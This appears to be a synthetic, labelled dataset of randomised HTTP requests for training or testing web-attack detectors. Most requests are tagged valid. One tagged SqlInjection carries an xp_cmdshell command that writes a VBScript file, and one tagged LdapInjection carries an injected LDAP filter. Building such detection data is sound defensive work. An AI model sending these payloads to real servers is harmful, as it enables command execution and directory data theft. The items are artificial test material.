If-Modified-Since: Tue, 07 Mar 06 23:10:51 GMT
If-Unmodified-Since: Tue, 14 Dec 04 08:12:27 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Apr 05 21:18:38 UTC
Max-Forwards: 5
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: Basic SGNhZnFIdzpvMHNycGE=
Range: 623768-8270,-361888,-69728
Referer: http://mstemwNa.org/lcliwoa/aeticf7y/bsneAgdr.pl
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.2 (compatible; feHetypl; Win 9x; oihhuAQeoa; osDhsnoHa; yneQvgls)
UA-CPU: Sparc
UA-Disp: 308,802,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3246x5463
Via: 3.9 www.leeu.htm, HTTP/7.1 www.Ttcqa.shtml
Transfer-Encoding: deflate
Upgrade: xAqmi/0.2, o1hgea/4.1, rIdu/2.7, hori/6.4, 4dToph/6.1
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6reletwt=942496&f7@libwx6mfIUt= 0n nhttp=Iepho=o&e562eiii=97&eqhh=~linkcat&noutdnmtauto=trttIa55e&1dCdrinDtn=i&nsu= &ElnbP7te=4&yopstetnig=rg>e&hrroo=onza9s&rLyfghrns=vnse&xGmimggbgsoundlV=i_RITV8&esoexkn=j-3EiJOTvzmL

End - Id: 34833
Start - Id: 27553
class: Valid
GET /esObov8ziy4rppwess/mihwtt/xCIkOb9Ar7@AnGjj/twgetMRZhdv/eKSGhA/Rognaw4O4Dtip2zitioT/h7eb10enOu47letsaN/qkey5lAnweha1iri/eT6jdI/rrYEheel.jpg?itiem_tL=98518270&mhevLd5u=108&.stdinHpcopyra.VH=ocsf HTTP/1.0
Host: 77.217.156.227:80
Connection: notxri
Accept: image/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.8, gzip, deflate;q=0.8, identity
Accept-Language: awsak-3aj, i-teafdhdI;q=0.5, cy-cbtm
Cache-Control: no-transform
Client-ip: 43.118.104.43
Cookie: emvVelazc=dtoaarigroup byylros;rnl=299239397;inrnSeria=2290329
Cookie2: $Version="6"
Date: Mon, 06 Feb 06 05:50:52 GMT
ETag: "9ZCxqi6vbsm4MmPpj"
Expect: shete=A2xRIa9
From: diTeooq@TnmlsC.net
If-Modified-Since: Sun, 26 Jun 05 08:09:05 GMT
If-Unmodified-Since: Wed, 14 Apr 04 03:56:57 UTC
If-Match: "@iFMmWiAbJlEpgwxLsk"
If-None-Match: *
If-Range: Mon, 31 May 04 01:20:46 CET
Max-Forwards: 954
MIME-Version: 2.1
Pragma: eyreea='xgroei'
Proxy-Authorization: Basic aWFvc2lmOmVlaGFzMw==
Authorization: Digest opaque="lesn"
Range: 4-,0-
Referer: http://aimsx0me.be/l6Fn/IaN3iui.jpg
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/9.3 (compatible; MSIE 2.5; Linux i586; 9xmtbn; nsta5dS)
UA-CPU: StrongARM
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 412x989
Via: 3.4 207.140.34.199
Transfer-Encoding: compress
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 039 www.arkr.tiff:90 "Gazauhqtpdrsdhhh" "Sat, 20 Feb 10 16:03:50 GMT"
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 03769
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 27553
Start - Id: 20460
class: Valid
GET /oIuETedhLs/n6b4/sJrsWK9lYWW6YUC/aepUpNm/5gEah5tyr/kOadminElibnyclB/iNX@ometa2R0aF95/elhnDT-2ri6BV/yealun4/htpassPsyD04xEo/jH8AKYQJTKNV-.nsf?e8ntgyeoq2isTc=tmX&inhtversheoru=+oiandabonyodontb&aobiEidtsle=hrl%3AecOqfY&oy9wtroheereein=pbotmp&n5vofcp=19185&ruin=6&2tifeaidro2doiv=303&r2hhb77oeqa=e1De7%25tcos+nz+0uniongn&4t=otO&abT1eas4tmxsz=q1n&ebh=trgoesater&gmkhh18Aee=sO.&RcmdcQrlibWszmCS=38&nph-mHI3ZhE=e++ HTTP/1.1
Host: 79.38.68.252
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: identity, gzip;q=0.8, deflate;q=0.1, deflate;q=0.4
Accept-Language: 5i9-sahr, easndjt-iotth, r-agdcd
Cache-Control: max-age=07
Client-ip: 83.158.227.172
Cookie: 0aabeoilsz=0813;eespiidjhkcued=8217;zegrnreoseaetEt=t1dKq1ZTZP;aerije=c13c;VCZRWZ=9
Cookie2: $Version="2"
Date: Sat, 21 Jul 07 06:16:56 GMT
ETag: W/"ULyg1rb0SVstg9wIa"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Sun, 28 Nov 04 14:49:01 GMT
If-Unmodified-Since: Tue, 14 Dec 04 16:23:51 GMT
If-Match: "wQVNi6FLVZV7ascDGG"
If-None-Match: "lJHxTm2iO0WT@ne-5m"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ekOhn5"
Authorization: eIIr dceso=5qeES
Range: -896,61-724379,-171
Referer: http://rsiyi.cz/sole/Iietnx/8u9si/ilhp/gptteile.php
TE: trailers
Trailer: From
User-Agent: Mozilla/7.4 (compatible; itena; Unix; rkmi; xtirnitnts)
UA-CPU: 68000
UA-Disp: 615,202,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3372x6941
Via: 7.9 www.diss.js
Transfer-Encoding: eco4i; nknswnjs=ythpeh
Upgrade: tt2t/3.5, h7sw/2.6, orae/2.0, use/2.6, esmt/6.9
Warning: 884 199.42.171.133 "deaa4rmnb5" "Fri, 14 Aug 09 11:14:45 UTC"
X-Forwarded-For: 69.102.148.135
X-Serial-Number: 4599369837031891295
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20460
Start - Id: 8676
class: Valid
GET /-FzGninxz.jpg?Y@wuz8zF2x=Frf&PSKOrLKbetweenH=f%5C%27-th2d+ly&esskSeaB=sCsrCrxAq&tTOyuehf=ozwD0S&eldiyo8leme=ryHsmRgjtsr&qMY5Z1H=73584661&uOy5foedzroha=8995366&eiwinntVOsa=70898&ew8=gtt&N1reaD.MapQi=7797640&EK1h3Vn7ehtpass=5gmsme%24i&erxceine=SRhrh&tol8vct=tr%29e%2Fng66so%3C HTTP/1.0
Host: 138.138.2.62:80
Connection: close
Accept: image/jpeg, audio/*;q=0.1
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 139.7.102.37
Cookie: rep=@ec;tle=zcm0gnprittneens0;ie2mamckq0edx6g=755
Cookie2: $Version="07"
Date: Thu, 18 May 06 20:07:03 GMT
ETag: "iY9VMKxeuws3lNflAJKJ"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Sat, 24 Nov 07 22:27:55 UTC
If-Unmodified-Since: Sat, 09 Sep 06 13:19:02 UTC
If-Match: *
If-None-Match: "ebMxeVb8QnuQ.jE8P"
If-Range: *
Max-Forwards: 513
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="DbdAB10dA04Cb5E87ec2504c6CDbdbE0"
Authorization: Digest realm
Range: -766,58-986789
Referer: /tduan/Lbngi2/uileliuU.cgi
TE: trailers,gzip,chunked;q=0.6
Trailer: Warning
User-Agent: hC6l8h9 http://www.eagd1.biz
UA-CPU: Sparc
UA-Disp: 953,263,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8393x485
Via: FTP/9.6 211.16.111.84, 4.0 119.242.24.211
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 173 52.61.224.109 "iicxlea7tnjtatQp" 
X-Forwarded-For: 16.101.184.213
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8676
Start - Id: 12583
class: Valid
GET /WPi5iIzpasswdw1/noIhrrO39uotI/N62/arlhbfealvcfddagteot/paeot/2iq4synI/eLi/dbGPuukgtjM6a2O/akeii/rCgnqRHt.htm?JUNFBqnBevalKS=mRthain&saspY=lSs&O2Qac-Zpr=w6mbendoasyti&5jnileype=xbk422S&r1fy=1574180264&ctlbrsw5=ds3&pz84MsystemS421l=712731&WC3Z=eDodaattvpd7ci&H8stesdo=s+&matig=4798957&tckt=B-sd%3CtfLVcgb0a&Zoexec7ridYGrmTzperl=lc8&I8tIstn2te=1405378893 HTTP/1.0
Host: www.7stppioyl.it
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252, x-mac-chinesesimp, x-mac-korean, x-mac-hebrew
Accept-Encoding: gzip;q=0.4, identity
Accept-Language: racgie-cBeCh;q=0.9, epqdiop-yaAei;q=0.4
Cache-Control: no-transform
Client-ip: 250.98.12.167
Cookie: nGOCxUDXh=868443836;Ys=48581
Cookie2: $Version="62"
Date: Thu, 14 Sep 06 21:17:27 GMT
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: r2nhMrp@wree.uk
If-Modified-Since: Fri, 10 Mar 06 12:22:59 GMT
If-Unmodified-Since: Thu, 01 Feb 07 05:36:47 GMT
If-Match: "5hRSnA6_@RqsxNQS"
If-None-Match: "aKgn3eR3AGW1QlMYCH"
If-Range: Sun, 21 Sep 08 07:49:43 GMT
Max-Forwards: 155
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: eOaElt tpdtue=e3ltv
Range: 132-,3231-699
Referer: http://9idb.cz/emnHdow/bengyl/rhaee5y.asmx
TE: trailers,chunked;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/3.3 (compatible; ieal; Mac OS X; rnscIoa2i)
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 366x415
Via: 7.8 www.iscs.css
Transfer-Encoding: 5ren; tbsihiC=mexev
Upgrade: uSo/9.1, rndat/1.0, nioo/1.0
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12583
Start - Id: 35049
class: SqlInjection
GET /j5HreKHa.cfm?DlroeTo2ehoqoe=70967187&qItepeCqtueehab=exec++xp_cmdshell+++++%27%22KhttudSz3%22+%3E%3E+script.vbs%27&Rjiutaytdoht=4ohttp+eDbgsoundninserts+wiag&oncklewu=uZTH&e0CTZU=306&giet2D=a%2Fxp&eetulamtoEay6sB=sYi%40KpkCkBQ&sdifeetnStbr=367&res=rxAKQW5Es&fjS=oD%3Dta&oscimms=huiRRcKibXXX&e6=%5Cf&nolsseazumeu=61&mti9swIredhfA=2390760 HTTP/1.0
Host: 86.213.34.82
Connection: keep-alive
Accept: audio/basic
Accept-Charset: iso-8859-1;q=0.8, x-mac-greek;q=0.7, iso-8859-6;q=0.8, iso-8859-3, us-ascii
Accept-Encoding: gzip;q=0.0, gzip, deflate, identity
Accept-Language: atmhN-hebhdr;q=0.1, n0t-rraiekws, reYl-eeaieS;q=0.5, Atu90Dep-r
Cache-Control: no-transform
Client-ip: 175.67.198.190
Cookie: EvLMMHU=l]sf;;imNriiwhesotdh= -;eao=cpinsertecho4;hYmNnata7oidbg= perl/c;homhYohi3r=aotAeijeseso;9ljb7=:
Cookie2: $Version="16"
Date: Sun, 31 Oct 04 23:38:29 CET
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Tue, 20 Nov 07 01:25:19 CET
If-Unmodified-Since: Sun, 09 Jul 06 21:21:06 CET
If-Match: "46c5G3R8B_Ictkyjsn"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: "sJgoAZjc8z8NEx880"
Max-Forwards: 43
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic dDlhaW46dXFjcA==
Authorization: Basic ZGZvaTphZW5lbg==
Range: -373777
Referer: http://www.onrev.biz/8wloar/4Rps/tptn/c9it/rotueHnh.pl
TE: trailers,gzip;q=0.0,deflate
User-Agent: nc6akx http://www.ep0r.fr
UA-CPU: StrongARM
UA-Color: color16
Via: bm2ai/6.3 48.150.35.97, FTP/7.6 75.172.130.221:97
Transfer-Encoding: compress
Upgrade: ntza0i/5.5
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35049
Start - Id: 28682
class: Valid
GET /xEZSRZl4StmpNro8/oq9Ws7PmH5i@/1akkalroAggcimnNs/Papassthrus.ju6lxhavingUgz/nsw/n4ur3or3cme/Wrr/g9.XbtUWYr/SEsertn0.png?1VIxpSY1=xrn&F0enoy=2&lecnan1=%7CeUo%5Dpu%5D2bgsoundBaN&eSmeaerun2eeqar=1&cavichbio=81068471&s9uoj=lsmt%7Er&xmlC7I4htacceslpXxI=mqoN2EonItr&rocNasoe=mZUf&QjQgxrEfN6O=17913796 HTTP/1.0
Host: www.a4eiyssak.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.1, compress;q=0.5, deflate;q=0.2, gzip, identity
Accept-Language: r-Fnc;q=0.2, hi-tf;q=0.6, oAtrae-5t
Cache-Control: max-age=2699
Client-ip: 150.211.232.249
Cookie: ie6between=371407;rrrqierdtuevnre=96594721;cciiuhulOaseai=ntjaouhHeinretmGt;u3VahjI@GeG7=gIr;uosnE9EDzes=z3GvXro
Cookie2: $Version="58"
Date: Sun, 05 Apr 09 22:25:52 CET
ETag: "TP8yCM86v@9eNQkTdSni"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Tue, 05 Jun 07 24:25:25 CET
If-Unmodified-Since: Mon, 06 Jul 09 11:12:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 49
MIME-Version: 8.8
Pragma: yAbflne=stmer
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nonce
Range: -440021
Referer: http://www.mi4rtotu.fr/Qininao/saMz/utctotiq.gz
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 4BTro30 http://www.tiajpeh.de
UA-CPU: Sparc
UA-Disp: 638,830,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 621x541
Via: HTTP/3.4 107.78.38.168, 1.2 www.eoeiiZgv.jpg
Transfer-Encoding: identity
Upgrade: nPnsc9/8.6, Bie/2.0
Warning: 301 www.imbgmn.html "3hfoDiswcieii1rergd1" "Thu, 12 May 05 01:08:10 UTC"
X-Forwarded-For: 29.114.114.72
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 28682
Start - Id: 31106
class: Valid
GET /uuW__g.5x/o1UdO.R6ibYw83q26cY6/NxoB@pP/rln/yBnlzB-DwPo8tu/cLca3xal/nH/eSqkHd2YHUe2Hsw-q/a1CPFQOKj68QL/ectaN5t/x7o..0O0.png?U3lyl009ta=4&bul=eainput&9xlgosiidrEEffh=8&eYu4ntecrpe=qRPkg&espoddntwss53=506900&etaum=anrtscns3ibodyna&y9e=812178&eameaaathduT=iRcrOuwt&lfttatihbh=ec%24wr&6eb=ttejH%40oar&zsogE8c=1824559&thhmh5zehRol=8&kSF9nb0m64=129&icietdsetdaEdbi=6197186 HTTP/1.0
Host: www.an3bT4.st
Connection: i7fg
Accept: */*
Accept-Charset: x-mac-turkish;q=0.4, iso-8859-8-i, windows-874, windows-1250;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: eFn-drxEro, era-1cyleVW
Cache-Control: max-stale=6213
Client-ip: 46.145.72.28
Cookie: KLzcatperlZBdXGL=899436
Cookie2: $Version="724"
Date: Sat, 18 Oct 08 05:53:29 GMT
ETag: W/"INCb4aafB5vkTC5g"
Expect: 100-continue
From: y6Jyr@oaos.uk
If-Modified-Since: Mon, 19 Jan 09 10:55:41 GMT
If-Unmodified-Since: Wed, 02 Jan 08 08:50:49 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 May 06 20:47:48 GMT
Max-Forwards: 8738
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: Basic ZTUxZTpycnJBcw==
Range: 47-,36714-0
Referer: http://oclevxat.uk/tiaei/dreZl/oaIiy0co.mpeg
TE: trailers,deflate,deflate
Trailer: TE
User-Agent: Mozilla/4.0 (X11; U; Linux i586 0.2; iT-oy; rv:6.1.6) Gecko/83966240
UA-CPU: PowerPC
UA-Disp: 334,6065,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1573x3760
Via: 5.8 www.LeNnaEs.jpeg, een5z/2.1 225.204.148.80
Transfer-Encoding: gzip
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 311 221.48.91.250:29839 "hOdjuaaVchtteasa" "Thu, 31 Jan 08 03:52:06 UTC"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 16589272146
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31106
Start - Id: 13269
class: Valid
GET /c4wgetR/szeioalmeauwgt/ndrsrsnCbste/mn0i0oshiog/lCdl/osaecicmilHoaz5ni/h2dm/4ijonimleii.mdb?c7c5PiotR=5662881912&enN3o=994803165&0Niecojoqdgtir=hnQbsRe9eyotFenhso&vleampogUs0t=guh9&sGnedstassan7=17735701&EeAph=%7Cwindow.openm%3Euasv%2Bao&emeeefne=fue&ui5sko=11305058&gohhbre=eretmaOnitdroplocationEl+co&OlQ2N9logfmg=avit HTTP/1.0
Host: 138.241.235.121:0
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: hz-gb-2312;q=0.4, koi8-r;q=0.5, iso-8859-9;q=0.2, utf-7, windows-1251
Accept-Encoding: deflate;q=0.5, identity, gzip;q=0.2
Accept-Language: *
Cache-Control: max-age=0149
Client-ip: 44.248.244.179
Cookie: Lm7ecg=emon@;hlehEe6er=Do$:
Cookie2: $Version="23"
Date: Mon, 27 Apr 09 14:00:38 GMT
ETag: W/"_U7Dq7FF1JXRYJzpS3j"
Expect: oxIda=eu5R9Na;ypalmfe
From: Geng@tdt1lr9s.biz
If-Modified-Since: Wed, 17 Dec 08 04:54:41 GMT
If-Unmodified-Since: Tue, 08 Jul 08 01:30:05 UTC
If-Match: *
If-None-Match: "pCMpUulJLjQyNQWxJpeC"
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 7341
MIME-Version: 0.5
Pragma: nHvn='ibsnf3ne'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dHJrc2ltbG86dnZPeTV0emE=
Range: 219-
Referer: http://6ashpli.st/o8shnowi/ihpdC.css
TE: trailers,deflate;q=0.9,gzip;q=0.1
Trailer: Date
User-Agent: Mozilla/5.2 (compatible; Konqueror/4.2; Linux i386; ees0; oemtz1sp; esthtaa8)
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2344x540
Via: 9.5 www.lseAwpe.htm:0
Transfer-Encoding: compress
Upgrade: wR3/7.6, otia/4.2, tdnt3/1.1, nttir/7.7, l7tde/6.2
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13269
Start - Id: 5835
class: Valid
PUT /98zkh6d30AgN1ydZCO_N.html? HTTP/1.0
Content-Length: 24
Content-Language: iJfobe2,hMmOredw,lna
Content-Encoding: deflate
Content-Location: http://eapbM.com/otsnpM/2la7d.png
Content-MD5: ZWU1NGhzZTRyZ2hzaUFpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Oct 04 16:35:48 UTC
Last-Modified: Sat, 27 May 06 23:22:14 UTC
Host: www.aohaaitd.net
Connection: gfdtoby
Accept: */*;q=0.4
Accept-Charset: utf-8;q=0.5, windows-1258, windows-1254, iso-2022-jp;q=0.2
Accept-Encoding: gzip;q=0.7, gzip, gzip
Accept-Language: m-hdirt
Cache-Control: no-cache
Client-ip: 138.176.20.40
Cookie: s0nue7o=mt7pi7erteih;a4hd=9;ih=wsD7aTaxuAa;y;ndeDisrdnuez=var&;a0hto=;ac-p3imiahtacceskoTtivareshutdownh
Cookie2: $Version="38"
Date: Fri, 14 Nov 08 05:35:04 CET
ETag: W/"4xTR0hwI4@WsOot@zvMm"
Expect: 100-continue
From: aAfrln@ydBmwa.net
If-Modified-Since: Sun, 15 Aug 04 15:57:31 GMT
If-Unmodified-Since: Wed, 15 Oct 08 23:48:33 GMT
If-Match: *
If-None-Match: "8UbUHydHktmNpkISvj"
If-Range: Fri, 05 Nov 04 15:34:58 GMT
Max-Forwards: 0884
MIME-Version: 2.2
Pragma: w=u2ajsiiw
Proxy-Authorization: NTLM dHdzcGVzcnZudGhiTmhlbXRkaGZkZXJvOXBrMGhjZXN1MmFyaHRubm8=
Authorization: Digest response="98504c5a4d45fdA13571776bDf99Cff8"
Range: 4-,812-694413
Referer: /getmnnt/p6swta.mdb
TE: chunked,deflate
Trailer: Range
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 7.9; dn-AN; rv:4.0.2) Gecko/03073541
UA-CPU: 68000
UA-Disp: 1618,105,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3215x099
Via: e3eucr/2.7 www.1dien.html, HTTP/3.1 www.1atho.css
Transfer-Encoding: gzip
Upgrade: e4c/1.1, hhpf/8.4, n1mot/3.4, n6dla/3.5
Warning: 161 210.131.126.108 "bzrjUioaiertes" "Tue, 24 Jun 08 01:01:36 GMT"
X-Forwarded-For: 238.36.196.14
X-Serial-Number: 8692230651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vaalceeynmat9=rLlerxNghn

End - Id: 5835
Start - Id: 13954
class: Valid
GET /optU3D-/ytZU5oZpc1xHGqi3Q./gfss4FExX/od-wWC/1x6oDGTi.MIWeformE/e3mdt6s7wmwsmeabqiI/6o2aiphbrnT/nobn/lJTM/nuTm.MI.jpeg?tTi7eoeiixnA=%5B2S&netuajp=2340&eV1fXS1u9.=wezaaEpnwEyp&mP5nnodeVYDhtpasslikeEs=%25te%3Ce4+t&qXngevallBQ=4097&amop1=%26t&rolnslbgtnoP=jismailsite&eawoslnsrealvo=21&nksqiAWet=i2e+i&Lkitmphome1mail7=1827563&sv=eylt7csostuorn&tMtehg80Cehe6=var+a2nc&iy4sezC=2430&trnSEz=1598671291&7n7likeOFLnny-=+ HTTP/1.1
Host: www.hifT.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-6;q=0.2, cp-932;q=0.6
Accept-Encoding: 
Accept-Language: a5krowtl-h5el, gtohf-eAmei3l;q=0.3, r-os;q=0.2, 3dgmdia-sdiee;q=0.7
Cache-Control: peene='hxta0le'
Client-ip: 87.204.53.134
Cookie: fT64czfG=fe tbbetweennfr;deoJ2OPvatcGt8e=8790031;etet=esX8t3X;dslmeamBssifb=xiiohfcrmelg3tg;n3ergno=jyn
Cookie2: $Version="38"
Date: Wed, 13 Sep 06 05:30:25 UTC
ETag: "W6cOlf_yqJ64Fb."
Expect: efbid
From: oalearnr@ntEfqd.fr
If-Modified-Since: Wed, 06 Oct 04 13:58:31 GMT
If-Unmodified-Since: Thu, 14 Jan 10 07:19:23 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 May 08 17:25:49 GMT
Max-Forwards: 52
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: snrqoV s1ss=Benjeh4e
Authorization: Digest algorithm=gehnbA
Range: 4-17952,40583-6085
Referer: /eogo/hnhyx/hdqoEhr/mfe1a/hsenoei.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.6 (Machintosh; U; PPC Mac OS X 2.1; nc-5r; rv:5.5.3) Gecko/44389095
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: uiS9e/6.0 www.aeeohhW.html, i7ktml/1.7 177.192.255.158
Transfer-Encoding: hbora; itr9rr2R=hnoi
Upgrade: nehtZ/1.7, Etrl/3.6, Qlo6i/7.7, jnbA/3.0
Warning: 952 www.ihnoa.tiff "yvctdraCnziihuee" "Sun, 13 May 07 06:23:22 UTC"
X-Forwarded-For: 222.27.179.251
X-Serial-Number: 5967398849780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13954
Start - Id: 38876
class: LdapInjection
GET /Nu6BHJpositionyKAVA.swf?v9os=747680&Ntih=546&7qHinput=r&dnwOElksrn=8ealshncewp-wo&nodeycatOPV=362977&ehbnsegt0eon=cxanoMnhrri&uEyxpbFtaitu=0KFHNvJ_x&4li=qn&9abXGsam7sA=ste%5Cfyeo&ulxnmflqm=51&ElytdeodbssHt=%29%28+++%7C++%28displayName%3Dhad*%29+%28name++++%3Dhad*%29%28++mail%3Dhad*+++%29 HTTP/1.1
Host: www.Wchye.biz:0
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, windows-1250, euc-jp, shift_jis
Accept-Encoding: compress, deflate, deflate, compress
Accept-Language: 90-ildr;q=0.5, i-q;q=0.9, 1-r, giioq-pt;q=0.7, wr-hmba
Cache-Control: only-if-cached
Client-ip: 9.41.106.201
Cookie: alnahniao2sspg=<hi;2N0STaCnjOP=27;sehoRl=aUr0fhIru1aoCtf
Cookie2: $Version="37"
Date: Mon, 10 Mar 08 19:34:14 CET
ETag: W/"kIaHUCP6c03l.Tt71Mx"
Expect: aetlNI
From: w08rh3@rpehekeyi.com
If-Modified-Since: Wed, 11 Oct 06 24:03:36 GMT
If-Unmodified-Since: Sat, 26 Apr 08 22:47:15 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 16 Jun 06 10:34:30 CET
Max-Forwards: 98
MIME-Version: 5.9
Pragma: a=pybortsb
Proxy-Authorization: Digest nc=7636d743
Authorization: iafh utshb=mi2oUa
Range: 15934-,799-8058,-81465
Referer: http://www.trLiGihh.st/56jw/aqg0oo/smvtpe.asp
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 8.7; um-xe; rv:5.3.8) Gecko/37153135
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: FTP/8.3 139.14.230.75
Transfer-Encoding: gzip
Upgrade: ie8dt4/3.8, nnn/9.0
Warning: 605 205.123.17.49:63776 "cb6tsipI2WEtibtnMi" "Mon, 26 Sep 05 17:29:00 CET"
X-Forwarded-For: 187.158.7.224
X-Serial-Number: 9521103915785136495
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38876
Start - Id: 14854
class: Valid
GET /b./jwEgottmvsecete/sqOYMR/abL3n@@.d/Dhri/QKX0PWH4JnodejSZ/rnOZ_KHzIq.js?Umv9=ih95rhhsorceh&eaatcoipecuua=594064&Eett7av=Nu+&nc=deEb&tzasirar=dasd0&tat=r-Aob&ruJal=a6Y.zF&bolaro5=3379&3tenakdMww6h=686886 HTTP/1.0
Host: 207.199.150.8
Connection: close
Accept: video/*;q=0.2, audio/basic;q=0.9, text/plain;q=0.1
Accept-Charset: x-mac-turkish;q=0.9
Accept-Encoding: identity, identity;q=0.5, deflate;q=0.4, deflate, deflate;q=0.9
Accept-Language: *;q=0.9
Cache-Control: max-stale=5788
Client-ip: 138.69.215.50
Cookie: LZopositionD6=-rzmttbm8location yainputm;bernrkhro6s=1891101;iteisyy=7572;rswten7=iehdf;fcnveoa=e;A55eis6eahNe7ir=0878295554
Cookie2: $Version="15"
Date: Mon, 05 Sep 05 13:00:12 GMT
ETag: "zg2q7CqDNcrH6SBI"
Expect: 100-continue
From: doomanl@8w3rc.it
If-Modified-Since: Wed, 09 Aug 06 15:10:49 CET
If-Unmodified-Since: Sat, 16 Jan 10 11:00:50 GMT
If-Match: *
If-None-Match: *
If-Range: "eC6ED2w9S33k2X1"
Max-Forwards: 943
MIME-Version: 8.0
Pragma: y='6cu1uoyp'
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM c0RlbmEyaG5iMmhlZW5IYXVic25vcGJvZXJkaWxwaHZlQ2VoY3Q5aG9BZ2ZlMg==
Range: -43,-61335,692292-223
Referer: http://www.totyz.ch/xeahegei.bin
TE: trailers
Trailer: Max-Forwards
User-Agent: errfrp (tZfXwj3P; oev-3mbrt)
UA-CPU: 68000
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: HTTP/4.3 212.152.19.121, aDorai/7.7 17.151.80.131, HTTP/9.8 195.247.77.33
Transfer-Encoding: compress
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 185 198.102.213.89 "omsaca1iefgroe" 
